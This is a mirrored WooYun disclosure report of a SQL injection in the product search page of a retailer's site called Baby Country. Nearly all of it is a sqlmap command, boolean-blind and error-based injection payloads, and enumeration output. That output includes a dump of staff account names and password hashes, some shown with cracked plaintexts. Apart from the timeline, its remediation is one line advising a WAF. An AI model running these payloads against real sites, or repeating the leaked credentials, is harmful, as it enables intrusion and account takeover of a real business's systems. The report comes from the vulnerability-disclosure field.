乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
Baby Country某处存在SQL注射漏洞(管理密码泄露)
地址:http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=
$ python sqlmap.py -u "http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=" -p searchkey --technique=BE --random-agent --batch -D hkbaby_pos -T t_user -C mName,mPassword,mTel,mEmail,mMobile_Phone --dump
Database: hkbaby_posTable: t_user[6 entries]+-------------------+---------------------------------------------+---------+---------+---------------+| mName | mPassword | mTel | mEmail | mMobile_Phone |+-------------------+---------------------------------------------+---------+---------+---------------+| Administrator | b8369ee75671dcdc385aa51b268d6c42 | NULL | NULL | NULL || Administrator | 6E4BA784DC5EB7D6004D5A241246D60F | <blank> | <blank> | <blank> || 101 | 38B3EFF8BAF56627478EC76A704E9B52 (101) | <blank> | <blank> | <blank> || 108 | A3C65C2974270FD093EE8A9BF8AE7D0B (108) | <blank> | <blank> | <blank> || Central Logistics | D41D8CD98F00B204E9800998ECF8427E () | <blank> | <blank> | <blank> || 技術支援 | B911D003A4B0252F650671B38EAD7FB1 (pericles) | <blank> | <blank> | <blank> |+-------------------+---------------------------------------------+---------+---------+---------------+
---Parameter: searchkey (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='---web application technology: Apacheback-end DBMS: MySQL 5.0current user: 'hkbabywebsite@%'current user is DBA: Falsedatabase management system users [1]:[*] 'hkbabywebsite'@'%'Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1495 || SESSION_VARIABLES | 512 || GLOBAL_VARIABLES | 497 || GLOBAL_STATUS | 403 || SESSION_STATUS | 403 || STATISTICS | 302 || COLLATION_CHARACTER_SET_APPLICABILITY | 219 || COLLATIONS | 219 || KEY_COLUMN_USAGE | 202 || PARTITIONS | 147 || TABLES | 147 || TABLE_CONSTRAINTS | 136 || PLUGINS | 46 || CHARACTER_SETS | 40 || INNODB_FT_DEFAULT_STOPWORD | 36 || SCHEMA_PRIVILEGES | 16 || ENGINES | 9 || INDEX_STATISTICS | 7 || TABLE_STATISTICS | 6 || SCHEMATA | 2 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+Database: hkbaby_pos+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| t_product_tx | 3787 || t_invoice_detail | 2115 || t_product_stock | 1955 || t_invoice | 1340 || t_invoice_moneycurrency | 1327 || t_invoice_paytype | 1327 || t_customer | 1322 || t_update | 1157 || t_product_barcode | 1001 || t_product | 829 || t_product_pricegroup | 805 || t_usergroup_right | 624 || log_info | 475 || t_supplier_invoice_in_detail | 447 || t_trading_invoice_detail | 443 || t_log | 355 || t_trading_invoice | 171 || t_stock_adjustment_in_detail | 162 || t_stocktake_detail | 162 || t_wishlist | 126 || t_brand | 91 || t_category | 75 || t_supplier_invoice_in | 74 || t_size | 22 || t_supplier | 21 || t_color | 16 || t_paytype | 8 || t_website | 7 || t_user | 6 || t_labelbarcode | 4 || t_usergroup | 4 || t_moneycurrency | 3 || t_stock | 3 || ad_right | 2 || t_groupdiscount | 2 || t_sc | 2 || t_station | 2 || t_unit | 2 || t_company | 1 || t_stock_adjustment_in | 1 || t_stocktake | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: hkbaby_posTable: t_company_onetimedicount[1 column]+-----------+--------------+| Column | Type |+-----------+--------------+| mPassword | varchar(255) |+-----------+--------------+Database: hkbaby_posTable: t_company[1 column]+---------------+--------------+| Column | Type |+---------------+--------------+| mFtp_Password | varchar(255) |+---------------+--------------+Database: hkbaby_posTable: t_user[1 column]+-----------+--------------+| Column | Type |+-----------+--------------+| mPassword | varchar(255) |+-----------+--------------+Database: hkbaby_posTable: t_company[1 entry]+---------------+| mFtp_Password |+---------------+| NULL |+---------------+Database: hkbaby_posTable: t_user[6 entries]+---------------------------------------------+| mPassword |+---------------------------------------------+| 38B3EFF8BAF56627478EC76A704E9B52 (101) || 6E4BA784DC5EB7D6004D5A241246D60F || A3C65C2974270FD093EE8A9BF8AE7D0B (108) || b8369ee75671dcdc385aa51b268d6c42 || B911D003A4B0252F650671B38EAD7FB1 (pericles) || D41D8CD98F00B204E9800998ECF8427E () |+---------------------------------------------+Database: hkbaby_posTable: t_company_onetimedicount[0 entries]+-----------+| mPassword |+-----------++-----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: searchkey (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='---web application technology: Apacheback-end DBMS: MySQL 5.0Database: hkbaby_posTable: t_user[13 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| mAddress | mediumtext || mCode | varchar(255) || mDepartment | varchar(255) || mEmail | varchar(255) || mFax | varchar(255) || mMobile_Phone | varchar(255) || mName | varchar(255) || mNon_Active | smallint(6) || mPassword | varchar(255) || mRemarks | mediumtext || mTel | varchar(255) || mUserGroup_Code | varchar(255) || T_User_ID | int(11) |+-----------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: searchkey (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='---web application technology: Apacheback-end DBMS: MySQL 5.0Database: hkbaby_posTable: t_user[6 entries]+-------------------+---------------------------------------------+---------+---------+---------------+| mName | mPassword | mTel | mEmail | mMobile_Phone |+-------------------+---------------------------------------------+---------+---------+---------------+| Administrator | b8369ee75671dcdc385aa51b268d6c42 | NULL | NULL | NULL || Administrator | 6E4BA784DC5EB7D6004D5A241246D60F | <blank> | <blank> | <blank> || 101 | 38B3EFF8BAF56627478EC76A704E9B52 (101) | <blank> | <blank> | <blank> || 108 | A3C65C2974270FD093EE8A9BF8AE7D0B (108) | <blank> | <blank> | <blank> || Central Logistics | D41D8CD98F00B204E9800998ECF8427E () | <blank> | <blank> | <blank> || 技術支援 | B911D003A4B0252F650671B38EAD7FB1 (pericles) | <blank> | <blank> | <blank> |+-------------------+---------------------------------------------+---------+---------+---------------+
上WAF。
危害等级:中
漏洞Rank:6
确认时间:2015-12-01 16:21
Referred to related parties.
暂无